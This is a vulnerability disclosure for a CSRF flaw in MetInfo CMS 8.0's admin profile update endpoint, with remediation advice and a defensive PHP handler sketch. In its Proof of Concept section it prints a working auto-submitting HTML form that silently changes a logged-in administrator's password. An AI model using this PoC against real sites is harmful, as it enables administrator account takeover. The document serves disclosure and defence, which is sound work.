CSRF Vulnerability in MetInfo 8.0 Allows Arbitrary Admin Password Change

Vulnerability Description

A Cross-Site Request Forgery (CSRF) vulnerability exists in MetInfo 8.0 that allows an attacker to change an administrator’s password without consent. By luring a logged-in admin to visit a crafted page, an auto-submitted POST request can update the admin profile password, resulting in account takeover.

Affected Product

  • Product: MetInfo CMS
  • Version: 8.0
  • Component: Admin Profile Update (/admin/?n=admin&c=index&a=doSaveInfo)
  • CWE: CWE-352: Cross-Site Request Forgery (CSRF)

Technical Details

The environment was set up locally using PHPStudy. After logging in to the admin panel, we navigated to the personal profile page and submitted an administrator password change. The request was intercepted with a proxy and analyzed to assess its CSRF protections. Replaying it changed the password from the original value to 123456 via the vulnerable endpoint.

Admin profile update interface: [figure: Admin Profile Page]

Generating a CSRF PoC from the captured request: [figure: Generate CSRF PoC]

Proof of Concept (PoC)

Save the following HTML as csrf2.html. When a logged-in admin visits the page, the form will auto-submit and change the admin password to 123456 without any user interaction.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://metlnfo/admin/?n=admin&c=index&a=doSaveInfo" method="POST" enctype="multipart/form-data">
<input type="hidden" name="admin_pass" value="123456" />
<input type="hidden" name="admin_pass_replay" value="123456" />
<input type="hidden" name="admin_name" value="fjl" />
<input type="hidden" name="admin_mobile" value="1" />
<input type="hidden" name="admin_email" value="1@qq.com" />
<input type="hidden" name="submit_type" value="save" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>

Open the PoC in a browser (e.g., Edge) while logged into MetInfo as admin: [figure: Open PoC]

Submitting the request indicates success: [figure: Request Success]

Re-login verifies the password has been changed: [figure: Re-login] [figure: Login Success]

Impact

  • Type: Cross-Site Request Forgery (CSRF)
  • Who is impacted: Any authenticated administrator who can be tricked into visiting an attacker-controlled page
  • Consequences:
    1. Unauthorized password change leading to administrator account takeover
    2. Further compromise of the system by performing privileged actions

Remediation

To mitigate this issue, MetInfo should:

  1. Enforce robust CSRF protections: include unpredictable per-session/per-request tokens and validate them server-side
  2. Validate Origin/Referer headers for state-changing requests
  3. Require re-authentication (current password) for sensitive operations such as password changes
  4. Apply SameSite cookies and disable cross-site requests where appropriate
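The following PHP sketch is an added example written for this writeup; it is not MetInfo's own code and does not reflect how the doSaveInfo handler is actually implemented. It shows how the four remediation points above fit together in one hardened profile-update handler. All function names, the `csrf_token` and `admin_pass_current` form fields, and the `$allowedHost` parameter are assumptions chosen for illustration.

```php
<?php
// Added example (not MetInfo's own code): a hardened handler for an admin
// profile/password update, covering the four remediation points above.
// Function names, the csrf_token / admin_pass_current fields and the
// $allowedHost parameter are assumptions for illustration.

declare(strict_types=1);

// 4. Session cookie restricted to same-site requests: a cross-site POST
//    (such as the auto-submitted PoC form) arrives without the admin's
//    session cookie, so it is never treated as an authenticated request.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Strict',
]);
session_start();

// 1. Unpredictable per-session token, generated once and kept server-side.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token with the stored one.
function csrf_token_is_valid(?string $submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// 2. Origin/Referer check: state-changing admin requests must come from the
//    site's own host. A request carrying neither header is rejected.
function request_origin_is_trusted(array $server, string $allowedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source === null) {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $allowedHost) === 0;
}

// 3. Re-authentication: the current password (stored as a password_hash()
//    value) must be supplied; a live session alone is not enough.
function password_change_is_authorised(string $storedHash, string $currentPassword): bool
{
    return $currentPassword !== '' && password_verify($currentPassword, $storedHash);
}

// Hardened equivalent of a doSaveInfo-style handler. Returns [status, message].
function handle_do_save_info(array $post, array $server, string $storedHash, string $allowedHost): array
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return [405, 'method not allowed'];
    }
    if (!request_origin_is_trusted($server, $allowedHost)) {
        return [403, 'cross-site request rejected'];
    }
    if (!csrf_token_is_valid($post['csrf_token'] ?? null)) {
        return [403, 'missing or invalid CSRF token'];
    }
    if (!password_change_is_authorised($storedHash, (string) ($post['admin_pass_current'] ?? ''))) {
        return [403, 'current password required'];
    }
    $newPass = (string) ($post['admin_pass'] ?? '');
    $replay  = (string) ($post['admin_pass_replay'] ?? '');
    if ($newPass === '' || $newPass !== $replay || strlen($newPass) < 12) {
        return [400, 'new passwords do not match or are too short'];
    }
    $newHash = password_hash($newPass, PASSWORD_DEFAULT);
    // Persist $newHash for the admin record here (storage layer omitted),
    // then rotate the session id so any previously issued session is dropped.
    session_regenerate_id(true);
    return [200, 'password updated'];
}

// The legitimate profile form must embed the token; a page on another origin
// cannot read it, so the auto-submitted PoC form cannot supply it.
// echo '<input type="hidden" name="csrf_token" value="'
//     . htmlspecialchars(csrf_token(), ENT_QUOTES) . '">';
```

Against the PoC above, each layer fails it independently: the browser sends an Origin of the attacker's page, so the host check rejects the request; the form carries no csrf_token, so the token check rejects it; it does not know the current password, so re-authentication rejects it; and with the session cookie marked SameSite=Strict the request is not even authenticated. Defence in depth matters here because Referer can be suppressed by the client and SameSite support depends on the browser, so the server-side token and current-password checks should not be skipped.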

Timeline

  • 2025-10-05: Vulnerability documented and PoC prepared
  • [Future Date]: Vendor notified
  • [Future Date]: CVE requested/assigned